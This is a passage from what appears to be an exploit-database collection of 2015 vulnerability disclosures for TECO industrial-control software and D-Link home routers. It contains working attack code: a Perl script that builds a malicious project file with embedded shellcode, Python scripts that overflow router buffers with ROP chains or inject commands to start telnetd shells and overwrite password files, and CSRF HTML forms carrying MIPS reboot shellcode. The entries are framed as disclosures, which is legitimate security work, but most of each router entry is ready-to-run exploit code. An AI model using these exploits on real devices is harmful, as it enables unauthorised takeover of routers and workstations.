# Desc: The vulnerability is caused due to a boundary error in the
# processing of a project file, which can be exploited to cause a
# buffer overflow when a user opens e.g. a specially crafted .LF5 file.
# Successful exploitation could allow execution of arbitrary code on
# the affected machine.
#
# ---------------------------------------------------------------------------------
# (14c0.12ec): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\MFC42.DLL -
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# eax=000026a0 ebx=0018f430 ecx=41414141 edx=00000001 esi=0018f408 edi=ffffd961
# eip=70735d7e esp=0018f350 ebp=0018f364 iopl=0         nv up ei ng nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210282
# MFC42!Ordinal2740+0xaa:
# 70735d7e 8b01            mov     eax,dword ptr [ecx]  ds:002b:41414141=????????
# 0:000> !exchain
# 0018f3e4: 41414141
# Invalid exception stack at 41414141
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
#            Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2015-5279
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5279.php
#
#
# 09.10.2015
#

my $header = "\x04\x00\x00\x00\x0A\x00\x00\x00\x4C\x35\x31\x30\x2D\x31".
             "\x50\x32\x2D\x48\x0E\x00\x00\x00\x14\x00\x00\x00\x01\x00";

# 113 bytes MessageBox shellcode
my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
         "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
         "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
         "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
         "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
         "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64".
         "\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe".
         "\x49\x0b\x31\xc0\x51\x50\xff\xd7";

my $buffer = "A" x 43 . "\xEB\x06\x90\x90" . "\xB0\x5D\x40\x00" . "\x90" x 16 . $sc . "\x90" x 20 . "D" x 2627;
my $file = "Gaming Nerdz.lf5";
my $junk = $header.$buffer;

open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "Malicious LF5 file created successfully!\n";
19. # TECO AP-PCLINK 1.094 TPC File Handling Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 1.094
#
# Summary: AP-PCLINK is the supportive software for TP03 or AP series, providing
# three edit modes as LADDER, IL, FBD and SFC, by which programs can be input rapidly
# and correctly. Every form written into the TP03 or AP series and AP-PCLINK can
# be monitored in the form of the data.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .TPC file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# Critical error detected c0000374
# (1950.ff0): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=76f70b42 edx=0018d98d esi=00360000 edi=41414141
# eip=76fce725 esp=0018dbe0 ebp=0018dc58 iopl=0         nv up ei pl nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
# ntdll!RtlpNtEnumerateSubKey+0x1af8:
# 76fce725 cc              int     3
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
#            Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2015-5278
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5278.php
#
#
# 09.10.2015
#
# PoC:
#   - http://zeroscience.mk/codes/aptpc-5278.zip
#   - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38703.zip
20. # TECO SG2 FBD Client 3.51 SEH Overwrite Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 3.51 and 3.40
#
# Summary: SG2 Client is a program that enables users to create and edit applications.
# The program provides two edit modes, LADDER and FBD, to rapidly and directly
# input the required app. The Simulation Mode allows users to virtually run and test
# the program before it is loaded to the controller.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a Genie FBD, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .GFB file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (fb0.fd0): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE
# eax=4141413f ebx=00000004 ecx=41414141 edx=41414141 esi=0018f578 edi=00a642e8
# eip=00440b57 esp=0018ef9c ebp=0000003f iopl=0         nv up ei pl nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
# FBD+0x40b57:
# 00440b57 8995a0000000    mov     dword ptr [ebp+0A0h],edx ss:002b:000000df=????????
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
#            Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2015-5276
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5276.php
#
#
# 09.10.2015
#
# PoC:
#   - http://zeroscience.mk/codes/sg2fbd-5276.zip
#   - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38701.zip
21. # TECO TP3-PCLINK 2.1 TPC File Handling Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Affected version: 2.1
#
# Summary: TP3-PCLINK Software is the supportive software for TP03, providing
# three edit modes as LADDER, IL, FBD and SFC, by which programs can be input
# rapidly and correctly.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .TPC file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (794.193c): C++ EH exception - code e06d7363 (first chance)
# Critical error detected c0000374
# (794.193c): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=778f0b42 edx=0018db71 esi=02730000 edi=41414141
# eip=7794e725 esp=0018ddc4 ebp=0018de3c iopl=0         nv up ei pl nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
# ntdll!RtlpNtEnumerateSubKey+0x1af8:
# 7794e725 cc              int     3
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
#            Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2015-5277
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5277.php
#
#
# 09.10.2015
#
# PoC:
#   - http://zeroscience.mk/codes/tp3tpc-5277.zip
#   - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38702.zip
22. ## Advisory Information

Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline <patrick.cline@dlink.com> (Dlink)
CVE: None

Note: All these security issues have been discussed with the vendor and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061. However, the vendor has now taken the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices.

## Vulnerabilities Summary

I have come across 3 security issues in DIR-815 firmware which allow an attacker to exploit command injection and buffer overflows in authentication and HNAP functionality. All of them can be exploited by an unauthenticated attacker. The attacker can be on wireless LAN or WAN if the mgmt interface is exposed to attack directly, or using XSRF if not exposed.

## Details

Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import urllib
import urllib2

# This exploits the auth_main.cgi with read buffer overflow exploit for v2.02
# prerequisite is just to have id and password fields in params
url = 'http://192.168.0.1/authentication.cgi'
junk = "A"*1004+"B"*37+"\x58\xf8\x40\x00" # address of system function in executable
junk+="X"*164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA"
values = "id=test&password=test&test="+junk
req = urllib2.Request(url, values)
response = urllib2.urlopen(req)
the_page = response.read()
----------------------------------------------------------------------------------------------------------------------

Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct

# format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"*286
buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0)
buf+= "B"*20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload
buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------

Command injection in
----------------------------------------------------------------------------------------------------------------------
import socket
import struct

# CSRF or any other trickery, but probably only works when connected to network I suppose
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.1", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley
23. ## Advisory Information

Title: Dlink DIR-615 Authenticated Buffer overflow in Ping and Send email functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline <patrick.cline@dlink.com> (Dlink)
CVE: None

Note: All these security issues have been discussed with the vendor and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061. However, the vendor has now taken the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR-615 -- Wireless N300 router from Dlink. Mainly used by home and small offices.

## Vulnerabilities Summary

I have come across 2 security issues in DIR-615 firmware which allow an attacker using an XSRF attack to exploit buffer overflow vulnerabilities in ping and send email functionality.

## Details

# Ping buffer overflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi">
<input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------

# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi">
<input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley
24. ## Advisory Information

Title: Dlink DIR-645 UPNP Buffer Overflow
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None

Note: All these security issues have been discussed with the vendor and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061. However, the vendor has now taken the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR-645 -- Whole Home Router 1000 from Dlink. Mainly used by home and small offices.

## Vulnerabilities Summary

I have come across 2 security issues in DIR-645 firmware which allow an attacker on the wireless LAN and possibly the WAN network to execute command injection and buffer overflow attacks against the wireless router. I have provided exploit scripts written in python that give details of the exploits. The buffer overflow does not have a payload at this time; however, if you watch the exploit in a debugger, it can be clearly seen that the payload uses ROP techniques to get to the stack payload, which is a bunch of C's for now on the stack. It can be replaced with any payload that works on the MIPS little endian architecture.

## Details

# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct

buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------

# Buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct

exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158
exploit_buffer+="C"*50+"Z"*46
exploit_buffer+="\xb4\x67\xb3\x2a"
exploit_buffer+="\xd0\xeb\xb4\x2a"
exploit_buffer+="VVVV"
exploit_buffer+="\x7c\xba\xb1\x2a"
exploit_buffer+="K"*16
exploit_buffer+="\x44\x3b\xb0\x2A"
exploit_buffer+="A"*36
exploit_buffer+="\xf0\x5e\xb0\x2A"
exploit_buffer+="H"*16
exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n"
print "[+] sending exploit_bufferfer size", len(exploit_buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 80))
s.send(exploit_buffer)
----------------------------------------------------------------------------------------------------------------------

## Report Timeline

* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley
25. ## Advisory Information

Title: DIR-880L Buffer overflows in authentication and HNAP functionalities.
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline <patrick.cline@dlink.com> (Dlink)
CVE: None

Note: All these security issues have been discussed with the vendor and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061. However, the vendor has now taken the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices.

## Vulnerabilities Summary

I have come across 2 security issues in DIR-880 firmware which allow an attacker to exploit buffer overflows in authentication and HNAP functionalities. The first 2 of the buffer overflows, in auth and HNAP, can be exploited by an unauthenticated attacker. The attacker can be on wireless LAN or WAN if the mgmt interface is exposed to attack directly, or using XSRF if not exposed. Also, this exploit needs to be run at least 200-500 times to bypass ASLR on ARM based devices. But it works, as the buffer overflow happens in a separate process from the web server, which does not allow the web server to crash, and hence the attacker wins.

## Details

Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct

#Currently the address of exit function in library used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------

Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct

buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley